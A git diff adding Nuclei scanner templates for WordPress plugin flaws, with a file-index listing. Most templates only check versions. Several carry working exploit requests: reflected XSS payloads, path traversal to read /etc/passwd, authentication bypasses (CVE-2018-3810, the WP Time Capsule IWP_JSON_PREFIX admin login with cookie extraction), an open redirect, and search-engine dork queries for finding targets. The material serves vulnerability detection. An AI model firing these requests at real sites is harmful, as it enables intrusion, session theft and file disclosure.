+./poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml
./poc/wordpress/smart-marketing-for-wp-ced803621ea0311a639aa79ba95d0a04.yaml
./poc/wordpress/smart-marketing-for-wp.yaml
./poc/wordpress/smartmag-responsive-retina-wordpress-magazine-cbf2c0f2049aa1f11e685ad27e85256f.yaml
@@ -136018,6 +136261,7 @@
./poc/wordpress/thinkit-wp-contact-form-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/thinkit-wp-contact-form-plugin.yaml
./poc/wordpress/thinkit-wp-contact-form.yaml
+./poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml
./poc/wordpress/threewp-email-reflector-2b712155339ba6bb233ef4ca5805963a.yaml
./poc/wordpress/threewp-email-reflector.yaml
./poc/wordpress/transposh-translation-filter-for-wordpress-062cf6128cd71496bc9f9e8e75b9e3cb.yaml
@@ -136083,6 +136327,7 @@
./poc/wordpress/verbalize-wp.yaml
./poc/wordpress/verweise-wordpress-twitter-2964744389fb5f1e33539ac6baa901dc.yaml
./poc/wordpress/verweise-wordpress-twitter.yaml
+./poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml
./poc/wordpress/videojs-html5-video-player-for-wordpress-4eb103ae150e63f14ea0465bbdd222cb.yaml
./poc/wordpress/videojs-html5-video-player-for-wordpress.yaml
./poc/wordpress/viewpoint-system-status-11016.yaml
@@ -138542,6 +138787,7 @@
./poc/wordpress/wp-filemanager.yaml
./poc/wordpress/wp-film-studio-49f13dc6fa66760ca1ff6d5f40c3291d.yaml
./poc/wordpress/wp-film-studio.yaml
+./poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml
./poc/wordpress/wp-finder-xss-11445.yaml
./poc/wordpress/wp-finder-xss-11446.yaml
./poc/wordpress/wp-finder-xss-11447.yaml
@@ -138834,6 +139080,7 @@
./poc/wordpress/wp-hide-post.yaml
./poc/wordpress/wp-hide-security-enhancer-2a382d113b431bc3ea90b522ea6c775c.yaml
./poc/wordpress/wp-hide-security-enhancer-949cf036734f52d817c99198957fcd58.yaml
+./poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml
./poc/wordpress/wp-hide-security-enhancer-a29eacb2489023acacd8d32ef00c49c5.yaml
./poc/wordpress/wp-hide-security-enhancer-c06d2ba4b1ea598192f9d0e4403a1daa.yaml
./poc/wordpress/wp-hide-security-enhancer-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -139414,6 +139661,7 @@
./poc/wordpress/wp-marketing-automations.yaml
./poc/wordpress/wp-masquerade-6946da31a080f78d4bab5bc4d9e08e98.yaml
./poc/wordpress/wp-masquerade.yaml
+./poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml
./poc/wordpress/wp-matrix-gallery-45ba464412c6ae4b94e80349ccf8b660.yaml
./poc/wordpress/wp-matrix-gallery.yaml
./poc/wordpress/wp-maximum-upload-file-size-04759a9a8f073cb18fdeda9c67898ae7.yaml
@@ -139432,6 +139680,7 @@
./poc/wordpress/wp-media-library-categories-903b1f7c933a9d3f4b81cfe33b593514.yaml
./poc/wordpress/wp-media-library-categories-c4833aaf804a0c4e273407342064eef1.yaml
./poc/wordpress/wp-media-library-categories.yaml
+./poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
./poc/wordpress/wp-media-player-e7ce5b48a56bb28689a18116ede2e190.yaml
./poc/wordpress/wp-media-player.yaml
./poc/wordpress/wp-mega-theme.yaml
@@ -139485,6 +139734,7 @@
./poc/wordpress/wp-menu-cart-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/wordpress/wp-menu-cart-plugin.yaml
./poc/wordpress/wp-menu-cart.yaml
+./poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml
./poc/wordpress/wp-meta-and-date-remover-118904e8c976288b76d3619b8921ce5a.yaml
./poc/wordpress/wp-meta-and-date-remover-53a7dace1872d520f46fdcead285d0c8.yaml
./poc/wordpress/wp-meta-and-date-remover-6477bf18cad6c823db485408d49b337b.yaml
@@ -140053,6 +140303,7 @@
./poc/wordpress/wp-private-content-plus-225071e9ae085e01c69279c06acaae17.yaml
./poc/wordpress/wp-private-content-plus-345ac121f0293964f02d11db3261fea4.yaml
./poc/wordpress/wp-private-content-plus-73e3bc277a504f719dff9b56c8fe1187.yaml
+./poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml
./poc/wordpress/wp-private-content-plus-8399cc72e60881a40af3ce56aada6cb9.yaml
./poc/wordpress/wp-private-content-plus-c291ca39b147b2ed889e3d6401deefb3.yaml
./poc/wordpress/wp-private-content-plus-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -141010,6 +141261,7 @@
./poc/wordpress/wp-symposium.yaml
./poc/wordpress/wp-syntax-5fa1471b8621ae57e90a0948fa90499f.yaml
./poc/wordpress/wp-syntax.yaml
+./poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml
./poc/wordpress/wp-t-wap-9502e7aea17c6e5cf70e43ae94018124.yaml
./poc/wordpress/wp-t-wap.yaml
./poc/wordpress/wp-table-6bfac4f1efb2b97f1bd23e30846a82a5.yaml
diff --git a/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml b/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
new file mode 100644
index 0000000000..7f0398197f
--- /dev/null
+++ b/poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
@@ -0,0 +1,59 @@
+id: capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db
+
+info:
+ name: >
+ Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/capitalize-my-title/"
+ google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,capitalize-my-title,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "capitalize-my-title"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.3')
\ No newline at end of file
diff --git a/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml b/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
new file mode 100644
index 0000000000..07ba85af05
--- /dev/null
+++ b/poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
@@ -0,0 +1,59 @@
+id: cookielay-d1709b11e04e7ac0020e84fff5516e5a
+
+info:
+ name: >
+ Cookielay <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via cookielay Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cookielay/"
+ google-query: inurl:"/wp-content/plugins/cookielay/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cookielay,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cookielay/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cookielay"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml b/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
new file mode 100644
index 0000000000..d97cca740d
--- /dev/null
+++ b/poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
@@ -0,0 +1,59 @@
+id: mycred-b69b74183494c4b8dbaaa94b47c77a89
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
diff --git a/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml b/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
new file mode 100644
index 0000000000..e8b9f808c0
--- /dev/null
+++ b/poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
@@ -0,0 +1,59 @@
+id: otp-login-59e25716cd4187f6ae0041590ffc4112
+
+info:
+ name: >
+ Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/otp-login/"
+ google-query: inurl:"/wp-content/plugins/otp-login/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,otp-login,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "otp-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml b/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml
new file mode 100644
index 0000000000..675b060fc7
--- /dev/null
+++ b/poc/auth/third-party-cookie-eraser-a95c341c56a938945d517c311512eb15.yaml
@@ -0,0 +1,59 @@
+id: third-party-cookie-eraser-a95c341c56a938945d517c311512eb15
+
+info:
+ name: >
+ Third Party Cookie Eraser <= 1.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ded8f958-ed2a-43ab-8688-9f6d16515469?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/third-party-cookie-eraser/"
+ google-query: inurl:"/wp-content/plugins/third-party-cookie-eraser/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,third-party-cookie-eraser,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/third-party-cookie-eraser/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "third-party-cookie-eraser"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2011-4926-2089.yaml b/poc/cve/CVE-2011-4926-2089.yaml
new file mode 100644
index 0000000000..fb9c699a3f
--- /dev/null
+++ b/poc/cve/CVE-2011-4926-2089.yaml
@@ -0,0 +1,35 @@
+id: CVE-2011-4926
+info:
+ name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
+ author: daffainfo
+ severity: medium
+ description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4926
+ - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
+ - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
+ - http://www.openwall.com/lists/oss-security/2012/01/10/9
+ classification:
+ cve-id: CVE-2011-4926
+ metadata:
+ google-query: inurl:"/wp-content/plugins/adminimize/"
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/21
diff --git a/poc/cve/CVE-2011-5181-2118.yaml b/poc/cve/CVE-2011-5181-2118.yaml
new file mode 100644
index 0000000000..fb324d6a7d
--- /dev/null
+++ b/poc/cve/CVE-2011-5181-2118.yaml
@@ -0,0 +1,25 @@
+id: CVE-2011-5181
+info:
+ name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
+ tags: cve,cve2011,wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2016-1000135-2681.yaml b/poc/cve/CVE-2016-1000135-2681.yaml
new file mode 100644
index 0000000000..002bf598be
--- /dev/null
+++ b/poc/cve/CVE-2016-1000135-2681.yaml
@@ -0,0 +1,39 @@
+id: CVE-2016-1000135
+
+info:
+ name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+ author: daffainfo
+ severity: medium
+ description: Reflected XSS in wordpress plugin hdw-tube v1.2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
+ - http://www.vapidlabs.com/wp/wp_advisory.php?v=533
+ - https://wordpress.org/plugins/hdw-tube
+ - http://www.securityfocus.com/bid/93820
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2016-1000135
+ cwe-id: CWE-79
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2018-16283-3362.yaml b/poc/cve/CVE-2018-16283-3362.yaml
new file mode 100644
index 0000000000..4c485ff4b7
--- /dev/null
+++ b/poc/cve/CVE-2018-16283-3362.yaml
@@ -0,0 +1,31 @@
+id: CVE-2018-16283
+
+info:
+ name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
+ author: 0x240x23elu
+ severity: critical
+ description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/45438
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-16283
+ - https://github.com/springjk/wordpress-wechat-broadcast/issues/14
+ - http://seclists.org/fulldisclosure/2018/Sep/32
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2018-16283
+ cwe-id: CWE-22
+ tags: cve,cve2018,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"
+
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+
+# Enhanced by mp on 2022/04/26
diff --git a/poc/cve/CVE-2018-3810-3557.yaml b/poc/cve/CVE-2018-3810-3557.yaml
new file mode 100644
index 0000000000..a09e1612c4
--- /dev/null
+++ b/poc/cve/CVE-2018-3810-3557.yaml
@@ -0,0 +1,43 @@
+id: CVE-2018-3810
+
+info:
+ name: WordPress Smart Google Code Inserter Authentication Bypass
+ author: princechaddha
+ severity: critical
+ reference: https://www.exploit-db.com/exploits/43420
+
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2018-3810
+ cwe-id: CWE-287
+ description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code."
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
+
+ body: 'sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode'
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2020-8771-5339.yaml b/poc/cve/CVE-2020-8771-5339.yaml
new file mode 100644
index 0000000000..9c85185f0d
--- /dev/null
+++ b/poc/cve/CVE-2020-8771-5339.yaml
@@ -0,0 +1,55 @@
+id: CVE-2020-8771
+
+info:
+ name: WordPress WP Time Capsule Authentication Bypass
+ author: princechaddha
+ severity: critical
+ reference: https://github.com/SECFORCE/WPTimeCapsulePOC
+
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2020-8771
+ cwe-id: CWE-287
+ description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts."
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ IWP_JSON_PREFIX
+
+ - |
+ GET /wp-admin/index.php HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept: */*
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
'
+ - "
Dashboard
"
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - 'text/html'
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: header
+ regex:
+ - "wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"
diff --git a/poc/cve/CVE-2021-24226-5648.yaml b/poc/cve/CVE-2021-24226-5648.yaml
new file mode 100644
index 0000000000..2548bcc24e
--- /dev/null
+++ b/poc/cve/CVE-2021-24226-5648.yaml
@@ -0,0 +1,33 @@
+id: CVE-2021-24226
+
+info:
+ name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage
+ author: dhiyaneshDK
+ severity: high
+ description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required.
+ reference:
+ - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24226
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2021-24226
+ cwe-id: CWE-200
+ tags: wordpress,cve,cve2021,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '
'
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/poc/cve/CVE-2021-24298-5686.yaml b/poc/cve/CVE-2021-24298-5686.yaml
new file mode 100644
index 0000000000..21462431a1
--- /dev/null
+++ b/poc/cve/CVE-2021-24298-5686.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-24298
+
+info:
+ name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298
+ tags: cve,cve2021,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24298
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/CVE-2021-24316-5695.yaml b/poc/cve/CVE-2021-24316-5695.yaml
new file mode 100644
index 0000000000..00b724d223
--- /dev/null
+++ b/poc/cve/CVE-2021-24316-5695.yaml
@@ -0,0 +1,34 @@
+id: CVE-2021-24316
+
+info:
+ author: 0x_Akoko
+ description: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS.
+ name: An Unauthenticated Reflected XSS & XFS Mediumish theme through 1.0.47 for WordPress
+ severity: medium
+ tags: cve,cve2021,mediumish,xss,wordpress
+ reference: |
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E '
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ - "Sorry, no posts matched your criteria."
+ part: body
+ condition: and
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
diff --git a/poc/cve/CVE-2021-24510-5759.yaml b/poc/cve/CVE-2021-24510-5759.yaml
new file mode 100644
index 0000000000..a6edca5010
--- /dev/null
+++ b/poc/cve/CVE-2021-24510-5759.yaml
@@ -0,0 +1,48 @@
+id: CVE-2021-24510
+
+info:
+ name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDK
+ severity: medium
+ description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
+ reference:
+ - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24510
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24510
+ cwe-id: CWE-79
+ tags: wordpress,cve,cve2021,wp-plugin,authenticated
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+ - |
+ GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><" HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
diff --git a/poc/cve/CVE-2021-24838-5769.yaml b/poc/cve/CVE-2021-24838-5769.yaml
new file mode 100644
index 0000000000..330119c99b
--- /dev/null
+++ b/poc/cve/CVE-2021-24838-5769.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-24838
+
+info:
+ name: AnyComment <= 0.2.21 - Open Redirect
+ author: noobexploiter
+ severity: medium
+ description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
+ reference:
+ - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24838
+ tags: wordpress,wp-plugin,open-redirect
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-24838
+ cwe-id: CWE-601
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+ - type: status
+ status:
+ - 302
diff --git a/poc/cve/CVE-2022-1609(1).yaml b/poc/cve/CVE-2022-1609(1).yaml
new file mode 100644
index 0000000000..4e6b12b21f
--- /dev/null
+++ b/poc/cve/CVE-2022-1609(1).yaml
@@ -0,0 +1,51 @@
+id: CVE-2022-1609
+
+info:
+ name: The School Management < 9.9.7 - Remote Code Execution
+ author: For3stCo1d
+ severity: critical
+ description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
+ remediation: |
+ Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability.
+ reference:
